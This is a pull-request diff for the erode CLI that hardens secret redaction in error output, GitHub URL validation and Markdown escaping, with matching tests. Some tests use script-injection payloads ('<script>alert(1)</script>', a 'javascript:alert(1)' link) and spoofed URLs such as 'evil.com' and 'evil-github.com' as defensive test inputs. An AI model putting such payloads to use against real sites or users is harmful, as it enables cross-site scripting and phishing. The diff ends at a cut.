### PR TITLE
fix: harden input validation and sensitive data handling

### DIFF
--- a/package-lock.json
+++ b/package-lock.json
@@ -85,7 +85,8 @@
     },
     "node_modules/@astrojs/compiler": {
       "version": "2.13.1",
-      "license": "MIT"
+      "license": "MIT",
+      "peer": true
     },
     "node_modules/@astrojs/internal-helpers": {
       "version": "0.7.5",
@@ -220,6 +221,7 @@
       "resolved": "https://registry.npmjs.org/@astrojs/starlight/-/starlight-0.37.6.tgz",
       "integrity": "sha512-wQrKwH431q+8FsLBnNQeG+R36TMtEGxTQ2AuiVpcx9APcazvL3n7wVW8mMmYyxX0POjTnxlcWPkdMGR3Yj1L+w==",
       "license": "MIT",
+      "peer": true,
       "dependencies": {
         "@astrojs/markdown-remark": "^6.3.1",
         "@astrojs/mdx": "^4.2.3",
@@ -300,6 +302,7 @@
     "node_modules/@babel/core": {
       "version": "7.29.0",
       "license": "MIT",
+      "peer": true,
       "dependencies": {
         "@babel/code-frame": "^7.29.0",
         "@babel/generator": "^7.29.0",
@@ -1455,6 +1458,7 @@
     "node_modules/@octokit/core": {
       "version": "7.0.6",
       "license": "MIT",
+      "peer": true,
       "dependencies": {
         "@octokit/auth-token": "^6.0.0",
         "@octokit/graphql": "^9.0.3",
@@ -2285,6 +2289,7 @@
       "resolved": "https://registry.npmjs.org/@types/node/-/node-24.11.0.tgz",
       "integrity": "sha512-fPxQqz4VTgPI/IQ+lj9r0h+fDR66bzoeMGHp8ASee+32OSGIkeASsoZuJixsQoVef1QJbeubcPBxKk22QVoWdw==",
       "license": "MIT",
+      "peer": true,
       "dependencies": {
         "undici-types": "~7.16.0"
       }
@@ -2341,6 +2346,7 @@
     "node_modules/@typescript-eslint/parser": {
       "version": "8.56.1",
       "license": "MIT",
+      "peer": true,
       "dependencies": {
         "@typescript-eslint/scope-manager": "8.56.1",
         "@typescript-eslint/types": "8.56.1",
@@ -2716,6 +2722,7 @@
     "node_modules/acorn": {
       "version": "8.16.0",
       "license": "MIT",
+      "peer": true,
       "bin": {
         "acorn": "bin/acorn"
       },
@@ -2906,6 +2913,7 @@
       "resolved": "https://registry.npmjs.org/astro/-/astro-5.18.0.tgz",
       "integrity": "sha512-CHiohwJIS4L0G6/IzE1Fx3dgWqXBCXus/od0eGUfxrZJD2um2pE7ehclMmgL/fXqbU7NfE1Ze2pq34h2QaA6iQ==",
       "license": "MIT",
+      "peer": true,
       "dependencies": {
         "@astrojs/compiler": "^2.13.0",
         "@astrojs/internal-helpers": "0.7.5",
@@ -3190,6 +3198,7 @@
     "node_modules/astro/node_modules/zod": {
       "version": "3.25.76",
       "license": "MIT",
+      "peer": true,
       "funding": {
         "url": "https://github.com/sponsors/colinhacks"
       }
@@ -3371,6 +3380,7 @@
         }
       ],
       "license": "MIT",
+      "peer": true,
       "dependencies": {
         "baseline-browser-mapping": "^2.9.0",
         "caniuse-lite": "^1.0.30001759",
@@ -3813,6 +3823,7 @@
       "integrity": "sha512-hr4ihw+DBqcvrsEDioRO31Z17x71pUYoNe/4h6Z0wB72p7MU7/9gH8Q3s12NFhHPfYBBOV3qyfUxmr/Yn3shnQ==",
       "dev": true,
       "license": "MIT",
+      "peer": true,
       "dependencies": {
         "env-paths": "^2.2.1",
         "import-fresh": "^3.3.0",
@@ -4320,6 +4331,7 @@
       "version": "0.27.3",
       "hasInstallScript": true,
       "license": "MIT",
+      "peer": true,
       "bin": {
         "esbuild": "bin/esbuild"
       },
@@ -4377,6 +4389,7 @@
       "resolved": "https://registry.npmjs.org/eslint/-/eslint-10.0.2.tgz",
       "integrity": "sha512-uYixubwmqJZH+KLVYIVKY1JQt7tysXhtj21WSvjcSmU5SVNzMus1bgLe+pAt816yQ8opKfheVVoPLqvVMGejYw==",
       "license": "MIT",
+      "peer": true,
       "dependencies": {
         "@eslint-community/eslint-utils": "^4.8.0",
         "@eslint-community/regexpp": "^4.12.2",
@@ -6047,6 +6060,7 @@
       "version": "2.6.1",
       "devOptional": true,
       "license": "MIT",
+      "peer": true,
       "bin": {
         "jiti": "lib/jiti-cli.mjs"
       }
@@ -8136,6 +8150,7 @@
     "node_modules/picomatch": {
       "version": "4.0.3",
       "license": "MIT",
+      "peer": true,
       "engines": {
         "node": ">=12"
       },
@@ -8207,6 +8222,7 @@
         }
       ],
       "license": "MIT",
+      "peer": true,
       "dependencies": {
         "nanoid": "^3.3.11",
         "picocolors": "^1.1.1",
@@ -8845,6 +8861,7 @@
     "node_modules/rollup": {
       "version": "4.59.0",
       "license": "MIT",
+      "peer": true,
       "dependencies": {
         "@types/estree": "1.0.8"
       },
@@ -8941,8 +8958,7 @@
     },
     "node_modules/scheduler": {
       "version": "0.27.0",
-      "license": "MIT",
-      "peer": true
+      "license": "MIT"
     },
     "node_modules/semver": {
       "version": "7.7.4",
@@ -9612,6 +9628,7 @@
     "node_modules/typescript": {
       "version": "5.9.3",
       "license": "Apache-2.0",
+      "peer": true,
       "bin": {
         "tsc": "bin/tsc",
         "tsserver": "bin/tsserver"
@@ -10009,6 +10026,7 @@
     "node_modules/vite": {
       "version": "7.3.1",
       "license": "MIT",
+      "peer": true,
       "dependencies": {
         "esbuild": "^0.27.0",
         "fdir": "^6.5.0",
@@ -10598,6 +10616,7 @@
       "version": "2.8.2",
       "devOptional": true,
       "license": "ISC",
+      "peer": true,
       "bin": {
         "yaml": "bin.mjs"
       },
@@ -10634,6 +10653,7 @@
       "version": "8.18.0",
       "dev": true,
       "license": "MIT",
+      "peer": true,
       "dependencies": {
         "fast-deep-equal": "^3.1.3",
         "fast-uri": "^3.0.1",
@@ -10771,6 +10791,7 @@
     "node_modules/zod": {
       "version": "4.3.6",
       "license": "MIT",
+      "peer": true,
       "funding": {
         "url": "https://github.com/sponsors/colinhacks"
       }

--- a/packages/cli/src/utils/__tests__/error-handler.test.ts
+++ b/packages/cli/src/utils/__tests__/error-handler.test.ts
@@ -1,0 +1,113 @@
+import { describe, it, expect, vi, beforeEach, type MockInstance } from 'vitest';
+import { ErodeError, ErrorCode } from '@erode/core';
+
+vi.mock('../cli-helpers.js', () => ({
+  Logger: {
+    fail: vi.fn(),
+    warn: vi.fn(),
+    info: vi.fn(),
+    success: vi.fn(),
+  },
+}));
+
+import { ErrorHandler } from '../error-handler.js';
+
+function getErrorLines(spy: MockInstance): string[] {
+  return spy.mock.calls
+    .map((c: unknown[]) => c[0])
+    .filter((v): v is string => typeof v === 'string');
+}
+
+describe('ErrorHandler.formatError - sensitive key redaction', () => {
+  let consoleErrorSpy: MockInstance;
+
+  beforeEach(() => {
+    vi.restoreAllMocks();
+    consoleErrorSpy = vi.spyOn(console, 'error').mockReturnValue(undefined);
+    vi.spyOn(console, 'log').mockReturnValue(undefined);
+    vi.spyOn(console, 'warn').mockReturnValue(undefined);
+  });
+
+  it('should redact keys containing "token"', () => {
+    const error = new ErodeError('Test error', ErrorCode.AUTH_KEY_MISSING, 'Test user message', {
+      githubToken: 'ghp_secret123',
+    });
+
+    ErrorHandler.formatError(error);
+
+    const detailLine = getErrorLines(consoleErrorSpy).find((c) => c.includes('githubToken'));
+    expect(detailLine).toContain('***REDACTED***');
+    expect(detailLine).not.toContain('ghp_secret123');
+  });
+
+  it('should redact keys containing "secret"', () => {
+    const error = new ErodeError('Test error', ErrorCode.AUTH_KEY_MISSING, 'Test user message', {
+      apiSecret: 'supersecret',
+    });
+
+    ErrorHandler.formatError(error);
+
+    const detailLine = getErrorLines(consoleErrorSpy).find((c) => c.includes('apiSecret'));
+    expect(detailLine).toContain('***REDACTED***');
+    expect(detailLine).not.toContain('supersecret');
+  });
+
+  it('should redact keys containing "auth"', () => {
+    const error = new ErodeError('Test error', ErrorCode.NET_ERROR, 'Test user message', {
+      myAuthHeader: 'Bearer xyz',
+    });
+
+    ErrorHandler.formatError(error);
+
+    const detailLine = getErrorLines(consoleErrorSpy).find((c) => c.includes('myAuthHeader'));
+    expect(detailLine).toContain('***REDACTED***');
+    expect(detailLine).not.toContain('Bearer xyz');
+  });
+
+  it('should redact keys containing "key"', () => {
+    const error = new ErodeError('Test error', ErrorCode.AUTH_KEY_MISSING, 'Test user message', {
+      accessKey: 'AKIAIOSFODNN7',
+    });
+
+    ErrorHandler.formatError(error);
+
+    const detailLine = getErrorLines(consoleErrorSpy).find((c) => c.includes('accessKey'));
+    expect(detailLine).toContain('***REDACTED***');
+    expect(detailLine).not.toContain('AKIAIOSFODNN7');
+  });
+
+  it('should not redact non-sensitive keys', () => {
+    const error = new ErodeError('Test error', ErrorCode.NET_ERROR, 'Test user message', {
+      cloneUrl: 'https://github.com/owner/repo.git',
+    });
+
+    ErrorHandler.formatError(error);
+
+    const detailLine = getErrorLines(consoleErrorSpy).find((c) => c.includes('cloneUrl'));
+    expect(detailLine).toContain('https://github.com/owner/repo.git');
+    expect(detailLine).not.toContain('***REDACTED***');
+  });
+
+  it('should redact URL credentials in non-sensitive values', () => {
+    const error = new ErodeError('Test error', ErrorCode.IO_CLONE_FAILED, 'Test user message', {
+      cloneUrl: 'https://x-access-token@github.com/owner/repo.git',
+    });
+
+    ErrorHandler.formatError(error);
+
+    const detailLine = getErrorLines(consoleErrorSpy).find((c) => c.includes('cloneUrl'));
+    expect(detailLine).toContain('https://***@');
+    expect(detailLine).not.toContain('x-access-token@');
+  });
+});
+
+describe('ErrorHandler.getExitCode', () => {
+  it('returns 2 for config/auth errors', () => {
+    const error = new ErodeError('test', ErrorCode.AUTH_KEY_MISSING, 'msg');
+    expect(ErrorHandler.getExitCode(error)).toBe(2);
+  });
+
+  it('returns 1 for generic errors', () => {
+    expect(ErrorHandler.getExitCode(new Error('test'))).toBe(1);
+  });
+});

--- a/packages/cli/src/utils/__tests__/error-handler.test.ts
+++ b/packages/cli/src/utils/__tests__/error-handler.test.ts
@@ -30,50 +30,50 @@ describe('ErrorHandler.formatError - sensitive key redaction', () => {
 
   it('should redact keys containing "token"', () => {
     const error = new ErodeError('Test error', ErrorCode.AUTH_KEY_MISSING, 'Test user message', {
-      githubToken: 'ghp_secret123',
+      githubToken: 'test_value_redacted',
     });
 
     ErrorHandler.formatError(error);
 
     const detailLine = getErrorLines(consoleErrorSpy).find((c) => c.includes('githubToken'));
     expect(detailLine).toContain('***REDACTED***');
-    expect(detailLine).not.toContain('ghp_secret123');
+    expect(detailLine).not.toContain('test_value_redacted');
   });
 
   it('should redact keys containing "secret"', () => {
     const error = new ErodeError('Test error', ErrorCode.AUTH_KEY_MISSING, 'Test user message', {
-      apiSecret: 'supersecret',
+      apiSecret: 'test_value_redacted',
     });
 
     ErrorHandler.formatError(error);
 
     const detailLine = getErrorLines(consoleErrorSpy).find((c) => c.includes('apiSecret'));
     expect(detailLine).toContain('***REDACTED***');
-    expect(detailLine).not.toContain('supersecret');
+    expect(detailLine).not.toContain('test_value_redacted');
   });
 
   it('should redact keys containing "auth"', () => {
     const error = new ErodeError('Test error', ErrorCode.NET_ERROR, 'Test user message', {
-      myAuthHeader: 'Bearer xyz',
+      myAuthHeader: 'test_value_redacted',
     });
 
     ErrorHandler.formatError(error);
 
     const detailLine = getErrorLines(consoleErrorSpy).find((c) => c.includes('myAuthHeader'));
     expect(detailLine).toContain('***REDACTED***');
-    expect(detailLine).not.toContain('Bearer xyz');
+    expect(detailLine).not.toContain('test_value_redacted');
   });
 
   it('should redact keys containing "key"', () => {
     const error = new ErodeError('Test error', ErrorCode.AUTH_KEY_MISSING, 'Test user message', {
-      accessKey: 'AKIAIOSFODNN7',
+      accessKey: 'test_value_redacted',
     });
 
     ErrorHandler.formatError(error);
 
     const detailLine = getErrorLines(consoleErrorSpy).find((c) => c.includes('accessKey'));
     expect(detailLine).toContain('***REDACTED***');
-    expect(detailLine).not.toContain('AKIAIOSFODNN7');
+    expect(detailLine).not.toContain('test_value_redacted');
   });
 
   it('should not redact non-sensitive keys', () => {

--- a/packages/cli/src/utils/error-handler.ts
+++ b/packages/cli/src/utils/error-handler.ts
@@ -85,7 +85,7 @@ function isSensitiveKey(key: string): boolean {
 }
 
 function redactSensitiveValue(value: string): string {
-  return value.replace(/https?:\/\/[^@\s]+@/g, 'https://***@');
+  return value.replace(/\b(https?):\/\/[^@\s]+@/gi, '$1://***@');
 }
 
 export const ErrorHandler = {

--- a/packages/cli/src/utils/error-handler.ts
+++ b/packages/cli/src/utils/error-handler.ts
@@ -77,18 +77,15 @@ function provideSuggestions(error: ErodeError): void {
   }
 }
 
-const SENSITIVE_KEYS = new Set([
-  'token',
-  'apikey',
-  'api_key',
-  'secret',
-  'password',
-  'authorization',
-  'credential',
-]);
+const SENSITIVE_PATTERNS = ['token', 'key', 'secret', 'password', 'credential', 'auth', 'bearer'];
 
 function isSensitiveKey(key: string): boolean {
-  return SENSITIVE_KEYS.has(key.toLowerCase());
+  const lower = key.toLowerCase();
+  return SENSITIVE_PATTERNS.some((p) => lower.includes(p));
+}
+
+function redactSensitiveValue(value: string): string {
+  return value.replace(/https?:\/\/[^@\s]+@/g, 'https://***@');
 }
 
 export const ErrorHandler = {
@@ -99,7 +96,13 @@ export const ErrorHandler = {
         console.error('   Extra details:');
         for (const [key, value] of Object.entries(error.context)) {
           if (value !== undefined && value !== null) {
-            console.error(`   ${key}: ${isSensitiveKey(key) ? '***REDACTED***' : String(value)}`);
+            if (isSensitiveKey(key)) {
+              console.error(`   ${key}: ***REDACTED***`);
+            } else {
+              const display =
+                typeof value === 'string' ? redactSensitiveValue(value) : String(value);
+              console.error(`   ${key}: ${display}`);
+            }
           }
         }
       }

--- a/packages/core/src/__tests__/output.test.ts
+++ b/packages/core/src/__tests__/output.test.ts
@@ -61,7 +61,6 @@ function makeAnalysisResult(overrides: Partial<DriftAnalysisResult> = {}): Drift
 describe('buildStructuredOutput', () => {
   it('should return success status when no violations', () => {
     const result = buildStructuredOutput(makeAnalysisResult(), 'LikeC4');
-
     expect(result.status).toBe('success');
     expect(result.exitCode).toBe(0);
     expect(result.version).toBe('0.0.1');
@@ -84,7 +83,6 @@ describe('buildStructuredOutput', () => {
       }),
       'LikeC4'
     );
-
     expect(result.status).toBe('violations');
     expect(result.exitCode).toBe(1);
     expect(result.analysis.violations).toHaveLength(1);
@@ -93,7 +91,6 @@ describe('buildStructuredOutput', () => {
 
   it('should include metadata about PR and component', () => {
     const result = buildStructuredOutput(makeAnalysisResult(), 'LikeC4');
-
     expect(result.metadata.changeRequest?.number).toBe(42);
     expect(result.metadata.changeRequest?.title).toBe('Test PR');
     expect(result.metadata.component?.id).toBe('comp.api');
@@ -110,16 +107,15 @@ describe('buildStructuredOutput', () => {
         branch: 'drift/42',
       },
     });
-
     expect(result.selectedComponentId).toBe('comp.api');
     expect(result.candidateComponents).toHaveLength(1);
     expect(result.generatedChangeRequest?.action).toBe('created');
   });
 
   it('should include modelFormat', () => {
-    const result = buildStructuredOutput(makeAnalysisResult(), 'Structurizr');
-
-    expect(result.modelFormat).toBe('Structurizr');
+    expect(buildStructuredOutput(makeAnalysisResult(), 'Structurizr').modelFormat).toBe(
+      'Structurizr'
+    );
   });
 
   it('should include dependency changes', () => {
@@ -281,151 +277,67 @@ describe('formatAnalysisAsComment', () => {
 });
 
 describe('writeOutputToFile', () => {
-  beforeEach(() => {
-    mockWriteFileSync.mockClear();
-  });
+  beforeEach(() => mockWriteFileSync.mockClear());
 
-  it('should write JSON to the specified file', () => {
-    const output = buildStructuredOutput(makeAnalysisResult(), 'LikeC4');
-    writeOutputToFile(output, '/tmp/output.json');
-
+  it('should write pretty-printed JSON to the specified file', () => {
+    writeOutputToFile(buildStructuredOutput(makeAnalysisResult(), 'LikeC4'), '/tmp/output.json');
     expect(mockWriteFileSync).toHaveBeenCalledOnce();
     expect(mockWriteFileSync).toHaveBeenCalledWith('/tmp/output.json', expect.any(String), 'utf-8');
-
-    const call = mockWriteFileSync.mock.calls[0] as [string, string, string];
-    const writtenContent = JSON.parse(call[1]) as StructuredAnalysisOutput;
-    expect(writtenContent.status).toBe('success');
-  });
-
-  it('should write pretty-printed JSON', () => {
-    const output = buildStructuredOutput(makeAnalysisResult(), 'LikeC4');
-    writeOutputToFile(output, '/tmp/output.json');
-
-    const call = mockWriteFileSync.mock.calls[0] as [string, string, string];
-    const writtenJson = call[1];
+    const writtenJson = (mockWriteFileSync.mock.calls[0] as [string, string, string])[1];
+    expect((JSON.parse(writtenJson) as StructuredAnalysisOutput).status).toBe('success');
     expect(writtenJson).toContain('\n');
-    expect(writtenJson).toContain('  ');
   });
 });
 
 describe('formatErrorAsComment', () => {
-  it('should show rate limit message for ApiError with 429 status', () => {
-    const error = new ApiError('Resource exhausted', 429);
+  it.each([
+    [new ApiError('Resource exhausted', 429), 'rate limit was hit'],
+    [new ApiError('Request timeout', 408), 'timed out'],
+    [new ConfigurationError('Missing key'), 'configuration issue'],
+    [new Error('Something broke'), 'unexpected error happened'],
+  ])('shows appropriate message for %s', (error, expectedText) => {
     const output = formatErrorAsComment(error);
-
     expect(output).toContain(':x: **Analysis unsuccessful**');
-    expect(output).toContain('rate limit was hit');
-    expect(output).toContain('re-run the check');
-  });
-
-  it('should show timeout message for ApiError with timeout', () => {
-    const error = new ApiError('Request timeout', 408);
-    const output = formatErrorAsComment(error);
-
-    expect(output).toContain(':x: **Analysis unsuccessful**');
-    expect(output).toContain('timed out');
-    expect(output).toContain('try re-running');
-  });
-
-  it('should show config message for ConfigurationError', () => {
-    const error = new ConfigurationError('Missing GEMINI_API_KEY');
-    const output = formatErrorAsComment(error);
-
-    expect(output).toContain(':x: **Analysis unsuccessful**');
-    expect(output).toContain('configuration issue');
-    expect(output).toContain('API keys and tokens');
-  });
-
-  it('should show generic message for unknown errors', () => {
-    const error = new Error('Something broke');
-    const output = formatErrorAsComment(error);
-
-    expect(output).toContain(':x: **Analysis unsuccessful**');
-    expect(output).toContain('unexpected error happened');
-    expect(output).toContain('workflow logs');
-  });
-
-  it('should contain COMMENT_MARKER for upsert', () => {
-    const error = new Error('test');
-    const output = formatErrorAsComment(error);
-
+    expect(output).toContain(expectedText);
     expect(output).toContain(COMMENT_MARKER);
-  });
-
-  it('should contain the erode footer', () => {
-    const error = new Error('test');
-    const output = formatErrorAsComment(error);
-
     expect(output).toContain('*Automated by [erode]');
   });
 });
 
 describe('analysisHasFindings', () => {
-  it('should return true when violations are present', () => {
-    const result = makeAnalysisResult({
-      hasViolations: true,
-      violations: [{ severity: 'high', description: 'test' }],
-    });
-
-    expect(analysisHasFindings(result)).toBe(true);
-  });
-
-  it('should return true when model updates have add-only changes', () => {
-    const result = makeAnalysisResult({
-      modelUpdates: { add: ['comp.a -> comp.b'], relationships: [] },
-    });
-
-    expect(analysisHasFindings(result)).toBe(true);
-  });
-
-  it('should return true when model updates have remove-only changes', () => {
-    const result = makeAnalysisResult({
-      modelUpdates: { remove: ['comp.x -> comp.y'], relationships: [] },
-    });
-
-    expect(analysisHasFindings(result)).toBe(true);
-  });
-
-  it('should return true when model updates have both add and remove changes', () => {
-    const result = makeAnalysisResult({
-      modelUpdates: {
-        add: ['comp.a -> comp.b'],
-        remove: ['comp.x -> comp.y'],
-        relationships: [],
-      },
-    });
-
-    expect(analysisHasFindings(result)).toBe(true);
-  });
-
-  it('should return false when no findings are present', () => {
-    const result = makeAnalysisResult();
-
-    expect(analysisHasFindings(result)).toBe(false);
-  });
-
-  it('should return false when modelUpdates is undefined', () => {
-    const result = makeAnalysisResult({ modelUpdates: undefined });
-
-    expect(analysisHasFindings(result)).toBe(false);
-  });
-
-  it('should return false when model updates have empty arrays', () => {
-    const result = makeAnalysisResult({
-      modelUpdates: { add: [], remove: [], relationships: [] },
-    });
-
-    expect(analysisHasFindings(result)).toBe(false);
-  });
-
-  it('should return true when model updates have newComponents', () => {
-    const result = makeAnalysisResult({
-      modelUpdates: {
-        newComponents: [{ id: 'order_service', kind: 'service', name: 'Order Service' }],
-      },
-    });
-
-    expect(analysisHasFindings(result)).toBe(true);
+  it.each([
+    [
+      'violations present',
+      { hasViolations: true, violations: [{ severity: 'high', description: 'test' }] },
+      true,
+    ],
+    ['add-only model updates', { modelUpdates: { add: ['a -> b'], relationships: [] } }, true],
+    [
+      'remove-only model updates',
+      { modelUpdates: { remove: ['x -> y'], relationships: [] } },
+      true,
+    ],
+    [
+      'add + remove model updates',
+      { modelUpdates: { add: ['a -> b'], remove: ['x -> y'], relationships: [] } },
+      true,
+    ],
+    [
+      'newComponents present',
+      { modelUpdates: { newComponents: [{ id: 'svc', kind: 'service', name: 'Svc' }] } },
+      true,
+    ],
+    ['no findings', {}, false],
+    ['undefined modelUpdates', { modelUpdates: undefined }, false],
+    [
+      'empty model update arrays',
+      { modelUpdates: { add: [], remove: [], relationships: [] } },
+      false,
+    ],
+  ] as const)('returns %s => %s', (_label, overrides, expected) => {
+    expect(analysisHasFindings(makeAnalysisResult(overrides as Partial<DriftAnalysisResult>))).toBe(
+      expected
+    );
   });
 });
 
@@ -459,6 +371,24 @@ describe('formatPatchPrBody', () => {
     });
 
     expect(body).toContain('[PR #10: Add user auth](https://github.com/org/repo/pull/10)');
+  });
+
+  it.each([
+    { title: 'Fix `code` injection', escaped: '\\`code\\`', absent: '`code`' },
+    { title: 'Fix <script>alert(1)</script>', escaped: '\\<script\\>', absent: '<script>' },
+    { title: 'Fix path\\to\\file', escaped: '\\\\', absent: undefined },
+    { title: 'Fix table | injection', escaped: '\\|', absent: undefined },
+  ])('should escape special chars in PR title: $title', ({ title, escaped, absent }) => {
+    const body = formatPatchPrBody({
+      prNumber: 42,
+      prTitle: title,
+      prUrl: 'https://github.com/org/repo/pull/42',
+      summary: 'Summary',
+      insertedLines: ['  a -> b'],
+      skipped: [],
+    });
+    expect(body).toContain(escaped);
+    if (absent) expect(body).not.toContain(absent);
   });
 
   it('should render new components section in PR body', () => {

--- a/packages/core/src/adapters/likec4/__tests__/adapter-url-validation.test.ts
+++ b/packages/core/src/adapters/likec4/__tests__/adapter-url-validation.test.ts
@@ -1,0 +1,89 @@
+import { describe, it, expect, beforeEach } from 'vitest';
+import { LikeC4Adapter } from '../adapter.js';
+import type { ArchitecturalComponent } from '../../architecture-types.js';
+import { createMockModel, type MockLikeC4Model } from './fixtures/mock-model.js';
+
+class TestLikeC4Adapter extends LikeC4Adapter {
+  public setMockModel(model: MockLikeC4Model): void {
+    const adapter = this as unknown as {
+      model: MockLikeC4Model;
+      componentIndex: unknown;
+      relationships: unknown;
+    };
+    adapter.model = model;
+
+    const components = this.extractComponents();
+    const relationships = this.extractRelationships();
+    adapter.relationships = relationships;
+    adapter.componentIndex = this.buildComponentIndex(components);
+  }
+
+  public override extractComponents() {
+    return super.extractComponents();
+  }
+
+  public override extractRelationships() {
+    return super.extractRelationships();
+  }
+
+  public override buildComponentIndex(components: ArchitecturalComponent[]) {
+    return super.buildComponentIndex(components);
+  }
+}
+
+describe('LikeC4Adapter - URL spoofing protection', () => {
+  let adapter: TestLikeC4Adapter;
+
+  beforeEach(async () => {
+    const configModule = await import('../../../utils/config.js');
+    configModule.CONFIG.adapter.likec4.excludePaths = [];
+    configModule.CONFIG.adapter.likec4.excludeTags = [];
+
+    adapter = new TestLikeC4Adapter();
+    adapter.setMockModel(createMockModel());
+  });
+
+  it('should reject URLs from lookalike domains', () => {
+    const spoofedModel: MockLikeC4Model = {
+      elements: () => [
+        {
+          id: 'spoofed_service',
+          title: 'Spoofed Service',
+          kind: 'service',
+          tags: [],
+          links: ['https://evil-github.com/owner/repo'],
+        },
+      ],
+      relationships: () => [],
+    };
+    adapter.setMockModel(spoofedModel);
+    const components = adapter.extractComponents();
+    const spoofed = components.find((c) => c.id === 'spoofed_service');
+    expect(spoofed?.repository).toBeUndefined();
+  });
+
+  it('should reject URLs with github.com as query parameter', () => {
+    const spoofedModel: MockLikeC4Model = {
+      elements: () => [
+        {
+          id: 'query_spoofed',
+          title: 'Query Spoofed',
+          kind: 'service',
+          tags: [],
+          links: ['https://evil.com?redirect=github.com/owner/repo'],
+        },
+      ],
+      relationships: () => [],
+    };
+    adapter.setMockModel(spoofedModel);
+    const components = adapter.extractComponents();
+    const spoofed = components.find((c) => c.id === 'query_spoofed');
+    expect(spoofed?.repository).toBeUndefined();
+  });
+
+  it('should accept legitimate github.com URLs', () => {
+    const components = adapter.extractComponents();
+    const frontend = components.find((c) => c.id === 'frontend');
+    expect(frontend?.repository).toBe('https://github.com/example/frontend');
+  });
+});

--- a/packages/core/src/adapters/likec4/__tests__/adapter.test.ts
+++ b/packages/core/src/adapters/likec4/__tests__/adapter.test.ts
@@ -231,52 +231,6 @@ describe('LikeC4Adapter', () => {
     });
   });
 
-  describe('URL spoofing protection', () => {
-    it('should reject URLs from lookalike domains', () => {
-      const spoofedModel: MockLikeC4Model = {
-        elements: () => [
-          {
-            id: 'spoofed_service',
-            title: 'Spoofed Service',
-            kind: 'service',
-            tags: [],
-            links: ['https://evil-github.com/owner/repo'],
-          },
-        ],
-        relationships: () => [],
-      };
-      adapter.setMockModel(spoofedModel);
-      const components = adapter.extractComponents();
-      const spoofed = components.find((c) => c.id === 'spoofed_service');
-      expect(spoofed?.repository).toBeUndefined();
-    });
-
-    it('should reject URLs with github.com as query parameter', () => {
-      const spoofedModel: MockLikeC4Model = {
-        elements: () => [
-          {
-            id: 'query_spoofed',
-            title: 'Query Spoofed',
-            kind: 'service',
-            tags: [],
-            links: ['https://evil.com?redirect=github.com/owner/repo'],
-          },
-        ],
-        relationships: () => [],
-      };
-      adapter.setMockModel(spoofedModel);
-      const components = adapter.extractComponents();
-      const spoofed = components.find((c) => c.id === 'query_spoofed');
-      expect(spoofed?.repository).toBeUndefined();
-    });
-
-    it('should accept legitimate github.com URLs', () => {
-      const components = adapter.extractComponents();
-      const frontend = components.find((c) => c.id === 'frontend');
-      expect(frontend?.repository).toBe('https://github.com/example/frontend');
-    });
-  });
-
   describe('Allowed dependencies', () => {
     it('should correctly identify allowed dependencies', () => {
       const isAllowed1 = adapter.isAllowedDependency('frontend', 'api_gateway');

--- a/packages/core/src/adapters/likec4/__tests__/adapter.test.ts
+++ b/packages/core/src/adapters/likec4/__tests__/adapter.test.ts
@@ -231,6 +231,52 @@ describe('LikeC4Adapter', () => {
     });
   });
 
+  describe('URL spoofing protection', () => {
+    it('should reject URLs from lookalike domains', () => {
+      const spoofedModel: MockLikeC4Model = {
+        elements: () => [
+          {
+            id: 'spoofed_service',
+            title: 'Spoofed Service',
+            kind: 'service',
+            tags: [],
+            links: ['https://evil-github.com/owner/repo'],
+          },
+        ],
+        relationships: () => [],
+      };
+      adapter.setMockModel(spoofedModel);
+      const components = adapter.extractComponents();
+      const spoofed = components.find((c) => c.id === 'spoofed_service');
+      expect(spoofed?.repository).toBeUndefined();
+    });
+
+    it('should reject URLs with github.com as query parameter', () => {
+      const spoofedModel: MockLikeC4Model = {
+        elements: () => [
+          {
+            id: 'query_spoofed',
+            title: 'Query Spoofed',
+            kind: 'service',
+            tags: [],
+            links: ['https://evil.com?redirect=github.com/owner/repo'],
+          },
+        ],
+        relationships: () => [],
+      };
+      adapter.setMockModel(spoofedModel);
+      const components = adapter.extractComponents();
+      const spoofed = components.find((c) => c.id === 'query_spoofed');
+      expect(spoofed?.repository).toBeUndefined();
+    });
+
+    it('should accept legitimate github.com URLs', () => {
+      const components = adapter.extractComponents();
+      const frontend = components.find((c) => c.id === 'frontend');
+      expect(frontend?.repository).toBe('https://github.com/example/frontend');
+    });
+  });
+
   describe('Allowed dependencies', () => {
     it('should correctly identify allowed dependencies', () => {
       const isAllowed1 = adapter.isAllowedDependency('frontend', 'api_gateway');

--- a/packages/core/src/adapters/likec4/adapter.ts
+++ b/packages/core/src/adapters/likec4/adapter.ts
@@ -4,7 +4,7 @@ import { existsSync } from 'fs';
 import { resolve } from 'path';
 import { CONFIG } from '../../utils/config.js';
 import { validate } from '../../utils/validation.js';
-import { normalizeGitHubUrl } from '../url-utils.js';
+import { isGitHubUrl, normalizeGitHubUrl } from '../url-utils.js';
 import { ErodeError, AdapterError, ErrorCode } from '../../errors.js';
 import type { ArchitectureModelAdapter, VersionCheckResult } from '../architecture-adapter.js';
 import { LIKEC4_METADATA } from './metadata.js';
@@ -154,9 +154,7 @@ export class LikeC4Adapter implements ArchitectureModelAdapter {
   }
 
   protected extractRepositoryUrl(element: LikeC4Element): string | undefined {
-    const link = element.links?.find((l) =>
-      (typeof l === 'string' ? l : l.url).includes('github.com')
-    );
+    const link = element.links?.find((l) => isGitHubUrl(typeof l === 'string' ? l : l.url));
     return link ? normalizeGitHubUrl(typeof link === 'string' ? link : link.url) : undefined;
   }
 

--- a/packages/core/src/output.ts
+++ b/packages/core/src/output.ts
@@ -90,7 +90,7 @@ export function buildStructuredOutput(
 const COMMENT_MARKER = '<!-- erode -->';
 
 function escapeMarkdownLink(text: string): string {
-  return text.replace(/[[\]()]/g, '\\$&');
+  return text.replace(/[[\]()\\`<>|]/g, '\\$&');
 }
 
 /** Extras for formatting analysis results as a PR comment. */

--- a/packages/core/src/pipelines/__tests__/validate.test.ts
+++ b/packages/core/src/pipelines/__tests__/validate.test.ts
@@ -102,6 +102,18 @@ describe('findRepositoryLink via runValidate', () => {
     expect(result.unlinked).toBe(1);
   });
 
+  it('should reject non-http/https protocols', async () => {
+    const mockAdapter = makeMockAdapter([
+      { id: 'service_a', links: ['javascript:alert(1)//github.com/owner/repo'] },
+    ]);
+    vi.mocked(createAdapter).mockReturnValue(mockAdapter as never);
+
+    const result = await runValidate({ modelPath: '/fake' });
+
+    expect(result.linked).toBe(0);
+    expect(result.unlinked).toBe(1);
+  });
+
   it('should reject URLs with gitlab.com as subdomain prefix', async () => {
     const mockAdapter = makeMockAdapter([
       { id: 'service_a', links: ['https://evil-gitlab.com/group/project'] },

--- a/packages/core/src/pipelines/__tests__/validate.test.ts
